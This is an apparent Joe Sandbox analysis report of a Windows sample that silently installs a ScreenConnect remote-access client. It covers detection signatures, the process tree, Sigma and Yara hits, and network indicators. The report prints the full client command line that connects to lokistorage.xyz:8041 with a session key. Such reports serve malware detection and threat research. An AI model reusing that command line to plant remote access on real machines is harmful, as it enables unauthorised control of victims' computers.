Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tmpzNIZ0YQ.exe

Overview

General Information

Sample name:tmpzNIZ0YQ.exe
renamed because original name is a hash value
Original sample name:29e369f7b7ee09c8b15a8dc133561d4d71e55c100eeff8d7e72d2c6016b179e9.exe
Analysis ID:1554619
MD5:451079cd7676e46f571336c768a9e6f0
SHA1:1270abe5230d5ed13488cd55cd69854baa53b010
SHA256:29e369f7b7ee09c8b15a8dc133561d4d71e55c100eeff8d7e72d2c6016b179e9
Tags:95-164-16-15exelokistorage-xyzuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:50
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Performs DNS queries to domains with low reputation
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • tmpzNIZ0YQ.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\tmpzNIZ0YQ.exe" MD5: 451079CD7676E46F571336C768A9E6F0)
    • msiexec.exe (PID: 7496 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7540 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7604 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A147D8F4A2A0D4F5C5A36F7D0C7BF249 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7656 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7744 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 52881A0F31505AA001D51A2B2FDDE9ED MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7788 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4081353BA27C3192F1069208B3FE053F E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7824 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c=" MD5: 826314610D9E854477B08666330940B5)
    • ScreenConnect.WindowsClient.exe (PID: 7920 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "6499763b-8fe0-474c-8e02-22f9c957ab00" "User" MD5: AB5FA8D90645878D587F386D0E276C02)
    • ScreenConnect.WindowsClient.exe (PID: 8040 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "f01c433b-e368-416e-a09f-c16bb2e654cf" "System" MD5: AB5FA8D90645878D587F386D0E276C02)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
tmpzNIZ0YQ.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\418a04.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Installer\MSI8E59.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1418481996.0000000005EF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 4 entries
                    SourceRuleDescriptionAuthorStrings
                    0.2.tmpzNIZ0YQ.exe.5ef0000.9.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      9.2.ScreenConnect.WindowsClient.exe.236fa10.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        0.2.tmpzNIZ0YQ.exe.5ef0000.9.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          9.0.ScreenConnect.WindowsClient.exe.d0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.0.tmpzNIZ0YQ.exe.ce518c.5.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c=", ProcessId: 7824, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (20ae101cef0f1acf) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7540, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\(Default)
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-12T18:40:32.519144+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949709TCP
                              2024-11-12T18:41:10.092641+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949712TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: tmpzNIZ0YQ.exeReversingLabs: Detection: 21%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.9% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_04250E18 CryptProtectData,8_2_04250E18
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_04251671 CryptProtectData,8_2_04251671
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05D40094 CryptUnprotectData,8_2_05D40094
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05D40D40 CryptUnprotectData,8_2_05D40D40
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05D4008A CryptUnprotectData,8_2_05D4008A
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeEXE: msiexec.exeJump to behavior
                              Source: tmpzNIZ0YQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: tmpzNIZ0YQ.exeStatic PE information: certificate valid
                              Source: tmpzNIZ0YQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1477295453.000000000026D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tmpzNIZ0YQ.exe, MSI934C.tmp.3.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, 418a04.rbs.3.dr, MSI8E59.tmp.3.dr, MSI9148.tmp.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tmpzNIZ0YQ.exe, MSI7FE2.tmp.2.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1542649947.0000000001012000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: DNS query: lokistorage.xyz
                              Source: global trafficTCP traffic: 192.168.2.9:49708 -> 95.164.16.15:8041
                              Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49712
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49709
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: lokistorage.xyz
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: tmpzNIZ0YQ.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2662716124.0000000001E0F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002EC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
